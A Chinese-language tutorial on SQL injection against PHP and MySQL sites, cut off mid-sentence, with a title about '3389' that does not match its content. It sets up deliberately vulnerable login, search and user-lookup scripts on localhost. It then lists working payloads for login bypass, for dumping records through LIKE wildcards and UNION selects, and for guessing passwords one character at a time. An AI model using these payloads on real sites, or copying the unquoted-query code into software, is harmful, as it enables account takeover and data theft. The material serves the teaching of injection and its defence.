3389新思路 SQL渗透的一些技术

为什么呢？因为不管在什么语言里，在引号（包括单双）里，所有字符串均是常量，即使是dir这样的命令，也紧紧是字符串而已，并不能当做命令执行，除非是这样写的代码：

$command = ”dir c:“;

system($command);

否则仅仅只是字符串，当然，我们所说的命令不单指系统命令，我们这里说的是SQL语句，要让我们构造的SQL语句正常执行，就不能让我们的语句变成字符串，那么什么情况下会用单引号？什么时候不用呢？看看下面两句SQL语句：

①SELECT * FROM article WHERE articleid='$id'

②SELECT * FROM article WHERE articleid=$id

两种写法在各种程序中都很普遍，但安全性是不同的，第一句由于把变量$id放在一对单引号中，这样使得我们所提交的变量都变成了字符串，即使包含了正确的SQL语句，也不会正常执行，而第二句不同，由于没有把变量放进单引号中，那我们所提交的一切，只要包含空格，那空格后的变量都会作为SQL语句执行，我们针对两个句子分别提交两个成功注入的畸形语句，来看看不同之处。

①    指定变量$id为：

1' and 1=2 union select * from user where userid=1/*

此时整个SQL语句变为：

SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*'

②指定变量$id为：

1 and 1=2 union select * from user where userid=1

此时整个SQL语句变为：

SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1

看出来了吗？由于第一句有单引号，我们必须先闭合前面的单引号，这样才能使后面的语句作为SQL执行，并要注释掉后面原SQL语句中的后面的单引号，这样才可以成功注入，如果php.ini中magic_quotes_gpc设置为on或者变量前使用了addslashes()函数，我们的攻击就会化为乌有，但第二句没有用引号包含变量，那我们也不用考虑去闭合、注释，直接提交就OK了。

大家看到一些文章给出的语句中没有包含单引号例如pinkeyes的《php注入实例》中给出的那句SQL语句，是没有包含引号的，大家不要认为真的可以不用引号注入，仔细看看PHPBB的代码，就可以发现，那个$forum_id所在的SQL语句是这样写的：

$sql = ”SELECT *

FROM “ . FORUMS_TABLE . ”

WHERE forum_id = $forum_id“;

由于没有用单引号包含变量，才给pinkeyes这个家伙有机可乘，所以大家在写PHP程序的时候，记得用单引号把变量包含起来。当然，必要的安全措施是必不可少的。

简单的例子

先举一个例子来给大家了解一下PHP下的注入的特殊性和原理。当然，这个例子也可以告诉大家如何学习构造有效的SQL语句。

我们拿一个用户验证的例子，首先建立一个数据库和一个数据表并插入一条记录，如下：

CREATE DATABASE `injection`

CREATE TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

PRIMARY KEY (`userid`)

) ;

INSERT INTO `user` VALUES (1, 'angel', 'mypass');

验证用户文件的代码如下：

$servername = ”localhost“;

$dbusername = ”root“;

$dbpassword = ”“;

$dbname = ”injection“;

mysql_connect($servername,$dbusername,$dbpassword) or die (”数据库连接失败“);

$sql = ”SELECT * FROM user WHERE username='$username' AND password='$password'“;

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

if (empty($userinfo))

{

echo ”登陆失败“;

} else {

echo ”登陆成功“;

}

echo ”

SQL Query:$sql“;

?>

这时我们提交：

127.0.0.1/injection/user.php?username=angel' or 1=1

就会返回：

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:wwwinjectionuser.php on line 13

登陆失败

SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password=''

PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:wwwinjectionuser.php on line 13

看到了吗？单引号闭合后，并没有注释掉后面的单引号，导致单引号没有正确配对，所以由此可知我们构造的语句不能让Mysql正确执行，要重新构造：

127.0.0.1/injection/user.php?username=angel' or '1=1

这时显示”登陆成功“，说明成功了。或者提交：

127.0.0.1/injection/user.php?username=angel'/*

127.0.0.1/injection/user.php?username=angel'%23

这样就把后面的语句给注释掉了！说说这两种提交的不同之处，我们提交的第一句是利用逻辑运算，在ASP中运用可以说是非常广泛的，这个不用说了吧？第二、三句是根据mysql的特性，mysql支持/*和#两种注释格式，所以我们提交的时候是把后面的代码注释掉，值得注意的是由于编码问题，在IE地址栏里提交#会变成空的，所以我们在地址栏提交的时候，应该提交%23，才会变成#，就成功注释了，这个比逻辑运算简单得多了，由此可以看出PHP比ASP强大灵活多了。

通过上面的例子大家应该对PHP+MYSQL的注入有个感性的认识了吧？

语句构造

PHP+MYSQL注入的博大精深不仅仅体现在认证体系的饶过，语句的构造才是最有趣味的地方，但构造语句和ACCESS、MSSQL都有少许不同，但同样可以发挥得淋漓尽致。看下面的例子，

一、搜索引擎

网上有一大堆的PHP程序搜索引擎是有问题的，也就是提交特殊字符可以显示所有记录，包括不符合条件的，其实这个危害也不算大，因为允许用户输入关键字进行模糊查询的地方大多数都允许检索所有的记录。很多查询的设计就是这样的。

查询是只读的操作应该不会对数据产生破坏作用，不要太担心。不过泄露隐私不知道算不算危害，下面是一个标准的搜索引擎：

Search result

//search.php

$servername = ”localhost“;

$dbusername = ”root“;

$dbpassword = ”“;

$dbname = ”injection“;

mysql_connect($servername,$dbusername,$dbpassword) or die (”数据库连接失败“);

$keywords = $_GET['keywords'];

if (!empty($keywords))

{

$sql = ”SELECT * FROM article WHERE title LIKE '%$keywords%' $search ORDER BY title DESC“;

$result = mysql_db_query($dbname,$sql);

$tatol=mysql_num_rows($result);

echo ”

SQL Query:$sql

“;

if ($tatol <=0){

echo ”The “$keywords” was not found in all the record.

n“;

} else {

while ($article=mysql_fetch_array($result))

{

echo ”

“.htmlspecialchars($article[title]).”

n“;

} //while

}

} else {

echo ”Please enter some keywords.

n“;

}

?>

一般程序都是这样写的，如果缺乏变量检查，我们就可以改写变量，达到”注入“的目的，尽管没有危害，当我们输入”___“ 、”.__ “、”%“等类似的关键字时，会把数据库中的所有记录都取出来。如果我们在表单提交：

%' ORDER BY articleid/*

%' ORDER BY articleid#

__' ORDER BY articleid/*

__' ORDER BY articleid#

SQL语句就被改变成下面的样子了，

SELECT * FROM article WHERE title LIKE '%%' ORDER BY articleid/*%' ORDER BY title DESC

SELECT * FROM article WHERE title LIKE '%__' ORDER BY articleid#%' ORDER BY title DESC

就会列出所有记录，包括被隐藏的，还可以改变排列顺序。这个虽然危害不大，也算是注入的一种方式了吧？

二、查询字段

查询字段又可以分成两种，本表查询和跨表查询，这两种查询和ACCESS、MSSQL差不多，甚至更强大、更灵活、更方便。不知道为什么就是有人认为比ASP难？我们在ASP中经常使用的个别函数在PHP里要有小小的改动，如下：

① 本表查询

看下面一条SQL语句，多用在论坛或者会员注册系统查看用户资料的，

//user.php

$servername = ”localhost“;

$dbusername = ”root“;

$dbpassword = ”“;

$dbname = ”injection“;

mysql_connect($servername,$dbusername,$dbpassword) or die (”数据库连接失败“);

$sql = ”SELECT * FROM user WHERE username='$username'“;

$result = mysql_db_query($dbname,$sql);

$row = mysql_fetch_array($result);

if (!$row)

{

echo ”该记录不存在“;

echo ”

SQL Query:$sql

“;

exit;

}

echo ”你要查询的用户ID是：$row[userid]n“;

echo ”

SQL Query:$sql

“;

?>

当我们提交的用户名为真时，就会正常返回用户的ID，如果为非法参数就会提示相应的错误，由于是查询用户资料，我们可以大胆猜测密码就存在这个数据表里（现在我还没有碰见过密码是单独存在另一个表的程序），记得刚才的身份验证程序吗？和现在的相比，就少了一个AND条件，如下：

SELECT * FROM user WHERE username='$username' AND password='$password'

SELECT * FROM user WHERE username='$username'

相同的就是当条件为真时，就会给出正确的提示信息，如果我们构造出后面的AND条件部分，并使这部分为真，那我们的目的也就达到了，还是利用刚才建立的user数据库，用户名为angel，密码为mypass，

看了上面的例子，应该知道构造了吧，如果我们提交：

127.0.0.1/injection/user.php?username=angel' and password='mypass

这个是绝对为真的，因为我们这样提交上面的SQL语句变成了下面的样子：

SELECT * FROM user WHERE username='angel' AND password='mypass'

但在实际的攻击中，我们是肯定不知道密码的，假设我们知道数据库的各个字段，下面我们就开始探测密码了，首先获取密码长度：

127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6

在ACCESS中，用LEN()函数来获取字符串长度，在MYSQL中，要使用LENGTH()，只要没有构造错误，也就是说SQL语句能正常执行，那返回结果无外乎两种，不是返回用户ID，就是返回”该记录不存在"。当用户名为angel并且密码长度为6的时候返回真，就会返回相关记录，是不是和ASP里一样？再用LEFT()、RIGHT()、MID()函数猜密码：

127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

127.0.0.1/injection/user.php?username=angel' and LEFT(password,2)='my

127.0.0.1/injection/user.php?username=angel' and LEFT(password,3)='myp

127.0.0.1/injection/user.php?username=angel' and LEFT(password,4)='mypa

127.0.0.1/injection/user.php?username=angel' and LEFT(password,5)='mypas

127.0.0.1/injection/user.php?username=angel' and LEFT(password,6)='mypass

看，密码不是出来了吗？简单吧？当然实际情况会有不少条件限制，下面还会讲到这个例子的深入应用。

② 跨表查询

这部分就和ASP有点出入了，除了一定要用UNION连接两条SQL语句，最难掌握的就是字段的数量，如果看过MYSQL参考手册，就知道了在 SELECT 中的 select_expression (select_expression 表示你希望检索的列[字段]) 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。简单的说，也就是UNION后面查选的字段数量、字段类型都应该与前面的SELECT一样，而且，如果前面的SELECT为真，就同时返回两个SELECT的结果，当前面的SELECT为假，就会返回第二个SELECT所得的结果，某些情况会替换掉在第一个SELECT原来应该显示的字段.

看了这个图直观多了吧？所以应该先知道前面查询表的数据表的结构。如果我们查询两个数据表的字段相同，类型也相同，我们就可以这样提交:

SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM......